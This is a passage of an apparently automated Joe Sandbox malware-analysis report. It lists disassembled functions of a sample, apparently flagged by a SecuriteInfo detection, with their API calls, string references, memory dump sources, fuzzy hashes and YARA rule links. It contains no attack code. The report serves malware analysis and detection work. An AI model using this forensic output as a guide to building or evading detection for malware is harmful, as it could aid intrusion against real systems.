EncodePointer.KERNEL32(?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFED74
EncodePointer.KERNEL32(?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFED81
EncodePointer.KERNEL32(?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFED8E
EncodePointer.KERNEL32(?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFED9B
DecodePointer.KERNEL32(Function_0006EB00,?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFEDBC
__calloc_crt.LIBCMT ref: 6CEFEDD1
DecodePointer.KERNEL32(00000000,?,?,6CEFA2D4,6CF295C0,00000008,6CEFA468,?,?,?,6CF295E0,0000000C,6CEFA523,?), ref: 6CEFEDEB
GetCurrentThreadId.KERNEL32 ref: 6CEFEDFD

Strings

FlsFree, xrefs: 6CEFECE3
FlsGetValue, xrefs: 6CEFECC9
FlsSetValue, xrefs: 6CEFECD6
KERNEL32.DLL, xrefs: 6CEFECA0
FlsAlloc, xrefs: 6CEFECC1

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1868149495-3819984048
Opcode ID: 3efa3e9a99891ab777539f6aaa29d7092df5ba25af4c6c4d87987da1a8e219b9
Instruction ID: 4dc220400914270d2c439c0853f5e39e502329031d3f053ed4c89fceaa9c439e
Opcode Fuzzy Hash: 3efa3e9a99891ab777539f6aaa29d7092df5ba25af4c6c4d87987da1a8e219b9
Instruction Fuzzy Hash: EE319131E20724AFEFA1BF759C057553FB6F746628B35062AE47897A90DB319402CBE0

Function 6CEA0EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEA0EF2
std::_Xinvalid_argument.LIBCPMT ref: 6CEA0F14
_memmove.LIBCMT ref: 6CEA0F70
_memmove.LIBCMT ref: 6CEA0F95
_memmove.LIBCMT ref: 6CEA0FA9
_memmove.LIBCMT ref: 6CEA0FDB
_memmove.LIBCMT ref: 6CEA1182
std::_Xinvalid_argument.LIBCPMT ref: 6CEA11B6

Strings

invalid string position, xrefs: 6CEA11B1
string too long, xrefs: 6CEA0EED, 6CEA0F0F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 69d3ca9a2f3425b20e6e969bf55ca994924e6d777de0d3bef9f64af3143f8e7d
Instruction ID: 3213ca1efb784ae5feb3acb68d8e267138e39d555a8bd79dcf0e1b8d7667e5a7
Opcode Fuzzy Hash: 69d3ca9a2f3425b20e6e969bf55ca994924e6d777de0d3bef9f64af3143f8e7d
Instruction Fuzzy Hash: 73B14A71310144DFDB28CE9CCDD1A9E73B6EB86754728491DE892CFB81C634E8478BA2

Function 6CF07FC4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getBasicDataType.LIBCMT ref: 6CF07FFF
DName::operator=.LIBCMT ref: 6CF08013
DName::operator+=.LIBCMT ref: 6CF08021
UnDecorator::getPtrRefType.LIBCMT ref: 6CF0804D
UnDecorator::getDataIndirectType.LIBCMT ref: 6CF080CA
UnDecorator::getBasicDataType.LIBCMT ref: 6CF080D3
operator+.LIBCMT ref: 6CF08166

Strings

std::nullptr_t, xrefs: 6CF08122
volatile, xrefs: 6CF0800B, 6CF08139

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
String ID: std::nullptr_t$volatile
API String ID: 2203807771-3726895890
Opcode ID: 5bd798e9fbb27d8f0b24eef48cd9b5d3926987b103ec4fcec61ea7ed2ece470f
Instruction ID: 057fc0dcd8c0ed2f4bf5639645a348a62472a0c042435d245cc0be3fc6d9f00a
Opcode Fuzzy Hash: 5bd798e9fbb27d8f0b24eef48cd9b5d3926987b103ec4fcec61ea7ed2ece470f
Instruction Fuzzy Hash: 7441E272B04108FFCF209F54C861AEEBB75FF02B49F118167E95857A52C7319A46EB90

Function 6CEB49B0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6CF105A8), ref: 6CEB49EE
VariantInit.OLEAUT32(?), ref: 6CEB49F7
VariantInit.OLEAUT32(?), ref: 6CEB49FD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEB4A08
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB4A39
VariantClear.OLEAUT32(?), ref: 6CEB4A45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB4B66
VariantClear.OLEAUT32(?), ref: 6CEB4B76
VariantClear.OLEAUT32(?), ref: 6CEB4B7C
VariantClear.OLEAUT32(6CF105A8), ref: 6CEB4B82

Strings

1l, xrefs: 6CEB4B52
1l, xrefs: 6CEB4B11

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID: 1l$1l
API String ID: 2515392200-1092580327
Opcode ID: 81b0bacbda661baf60960b248d2dbee85f9b43e5daa98e3a7a925c017077bd04
Instruction ID: 23fe795988c82adc0084c0af86d342ef15c215f8a12ec1800e48aeb3501f2463
Opcode Fuzzy Hash: 81b0bacbda661baf60960b248d2dbee85f9b43e5daa98e3a7a925c017077bd04
Instruction Fuzzy Hash: 9E515F72A00219AFDB04DFA4CC84EBEBBB8FF89314F144169E915AB744D774A901CBA0

Function 6CEB4BA0 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 475COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEB4BDC
VariantInit.OLEAUT32(?), ref: 6CEB4BE5
VariantInit.OLEAUT32(?), ref: 6CEB4BEB
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEB4BF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB4C2A
VariantClear.OLEAUT32(?), ref: 6CEB4C37
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB5107
VariantClear.OLEAUT32(?), ref: 6CEB5117
VariantClear.OLEAUT32(?), ref: 6CEB511D
VariantClear.OLEAUT32(?), ref: 6CEB5123

Strings

2l, xrefs: 6CEB4D1A, 6CEB4EFF, 6CEB5031, 6CEB4D1D, 6CEB4F02, 6CEB5034

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID: 2l
API String ID: 2515392200-408751688
Opcode ID: 7c0209b8357d2802b8873ba7ed0dcbadb0712048c84cc1e2eb77c9f23fc6bd87
Instruction ID: 4a285f2d43e0dcca036dbfc8925b6dfa15b2b694f3890f3fe93c475042db668f
Opcode Fuzzy Hash: 7c0209b8357d2802b8873ba7ed0dcbadb0712048c84cc1e2eb77c9f23fc6bd87
Instruction Fuzzy Hash: 0712E575A15705AFC758DB98DD84DAAB3B9BF8D300F14466CF50AABB91CA30F841CB50

Function 6CEAF95E Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEAFA0F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEAFA22
SafeArrayGetElement.OLEAUT32 ref: 6CEAFA5A

Part of subcall function 6CEB3A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB3B71
Part of subcall function 6CEB3A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB3B83

Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Part of subcall function 6CEADFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEADFF6
Part of subcall function 6CEADFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEAE003
Part of subcall function 6CEADFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEAE02F

Strings

RS7m, xrefs: 6CEAFC82
RS{m, xrefs: 6CEAFC3E

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: RS7m$RS{m
API String ID: 959723449-144615663
Opcode ID: eb4e2d738d3d81ba18cc71cbc90b5abafe9e508053808edfff09320f27a6aaa4
Instruction ID: e807dd65f7b2a4dd0251bc38f1f7b5e196f4982b60dee9c56f1701ce478d1ba1
Opcode Fuzzy Hash: eb4e2d738d3d81ba18cc71cbc90b5abafe9e508053808edfff09320f27a6aaa4
Instruction Fuzzy Hash: 3AC16E70A01205AFDB14CFA8CD84FADB7B9AF89308F304198E945EB786DB75E945CB50

Function 6CEB3690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEB36CD
VariantInit.OLEAUT32(?), ref: 6CEB36DA
VariantInit.OLEAUT32(?), ref: 6CEB36E0
VariantInit.OLEAUT32(?), ref: 6CEB36E6
VariantInit.OLEAUT32 ref: 6CEB37DD
VariantCopy.OLEAUT32(?,?), ref: 6CEB37E4
VariantInit.OLEAUT32 ref: 6CEB3815
VariantCopy.OLEAUT32(?,?), ref: 6CEB381C
VariantClear.OLEAUT32(?), ref: 6CEB38A8
VariantClear.OLEAUT32(?), ref: 6CEB38AE
VariantClear.OLEAUT32(?), ref: 6CEB38B4
VariantClear.OLEAUT32(?), ref: 6CEB38BA

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: b133a9d2335ccaa0e7c8cb73d4b8bc3be0d5abe82f8d95634d3aceedbb77eaa2
Instruction ID: bbbffa1d455edb0a1cb628b804d9cc1bbd11180df28d6a089e63309fc477a183
Opcode Fuzzy Hash: b133a9d2335ccaa0e7c8cb73d4b8bc3be0d5abe82f8d95634d3aceedbb77eaa2
Instruction Fuzzy Hash: 2C818EB1901219AFDB04DFA8C981FEEBBB9BF49308F24415DE505AB740DB34E905CB90

Function 6CEBD880 Relevance: 18.2, APIs: 12, Instructions: 202COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEBD8EC
VariantInit.OLEAUT32 ref: 6CEBD902
VariantInit.OLEAUT32(?), ref: 6CEBD90D
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEBD929
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CEBD966
VariantClear.OLEAUT32(?), ref: 6CEBD973
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CEBD9B4
VariantClear.OLEAUT32(?), ref: 6CEBD9C1
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBDA6F
VariantClear.OLEAUT32(?), ref: 6CEBDA80
VariantClear.OLEAUT32(?), ref: 6CEBDA87
VariantClear.OLEAUT32(?), ref: 6CEBDA99

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: ab737afa7720999135b5a2cd1619ab4454a5b268a3cdcb0aa756dfcd7b686b77
Instruction ID: 018ae4212c2a4a0909623060210716880f5c53e5ad4a16fec8b8403a894cd41b
Opcode Fuzzy Hash: ab737afa7720999135b5a2cd1619ab4454a5b268a3cdcb0aa756dfcd7b686b77
Instruction Fuzzy Hash: 568146766083019FC700CF64C844B5ABBF4BFC9728F158A5DE9989B744E774EA05CB92

Function 6CEA12A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEA12DD
std::_Xinvalid_argument.LIBCPMT ref: 6CEA12FB
_memmove.LIBCMT ref: 6CEA1368
_memmove.LIBCMT ref: 6CEA139F
std::_Xinvalid_argument.LIBCPMT ref: 6CEA140C

Strings

invalid string position, xrefs: 6CEA1407
string too long, xrefs: 6CEA12D8, 6CEA12F6

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 9aff258bd2a57d4d054c08222175671c041906548b8ddc4a0bd206564468f183
Instruction ID: e638ac5cdceb6eb99e02943e81275589339bcef4e0695c993049020122d0c573
Opcode Fuzzy Hash: 9aff258bd2a57d4d054c08222175671c041906548b8ddc4a0bd206564468f183
Instruction Fuzzy Hash: 5C417031304244DFD714DEDDD880A9EB7B6EB813587750A2EE492CFF40D761D84A87A2

Function 6CEB47D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEB480C
VariantInit.OLEAUT32(?), ref: 6CEB4815
VariantInit.OLEAUT32(?), ref: 6CEB481B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEB4826
SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6CEB485B
VariantClear.OLEAUT32(?), ref: 6CEB4868
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB4974
VariantClear.OLEAUT32(?), ref: 6CEB4984
VariantClear.OLEAUT32(?), ref: 6CEB498A
VariantClear.OLEAUT32(?), ref: 6CEB4990

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 126b56f8f20811de5b6722ee6caabd2c65b8571dc6394ca6219fd4d98f2035d3
Instruction ID: 275eec0a2bd051323f643feaa6d0d7c6584843f79ccfbf733c5d4ad7c339d73c
Opcode Fuzzy Hash: 126b56f8f20811de5b6722ee6caabd2c65b8571dc6394ca6219fd4d98f2035d3
Instruction Fuzzy Hash: 72513D72A002499FDB04DFA4CD80EAEB7B9FF89314F15456EE505EBA40D774A905CB60

Function 6CEADCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEADD00
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6CEADD10
SafeArrayPutElement.OLEAUT32(00000000,6CEB2FFF,?), ref: 6CEADD47
VariantClear.OLEAUT32(?), ref: 6CEADD4F
SafeArrayPutElement.OLEAUT32(00000000,6CEB2FFF,?), ref: 6CEADD6D
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CEADDA4
VariantClear.OLEAUT32(?), ref: 6CEADDAC
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEADE16
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEADE27
VariantClear.OLEAUT32(?), ref: 6CEADE31

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
String ID:
API String ID: 3525949229-0
Opcode ID: 544fc5b61c80a7b0d6f8c7674b2250674915edf7d3c08efce7a031ca4d84f7e3
Instruction ID: 2324a9e3e2a95c562b0d72af919eb5b1859cd9ba59428a92793ff92a2be58e98
Opcode Fuzzy Hash: 544fc5b61c80a7b0d6f8c7674b2250674915edf7d3c08efce7a031ca4d84f7e3
Instruction Fuzzy Hash: 03515B75E01209AFDB01DFA5C884FDEBBB8FF99714F118119EA15AB710DB749901CBA0

Function 6CEAE120 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CEAE29B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CEAE2B6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CEAE2D7

Part of subcall function 6CEB5760: std::tr1::_Xweak.LIBCPMT ref: 6CEB5769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEAE309

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEAE523
InterlockedCompareExchange.KERNEL32(6CF3C6A4,45524548,4B4F4F4C), ref: 6CEAE544

Strings

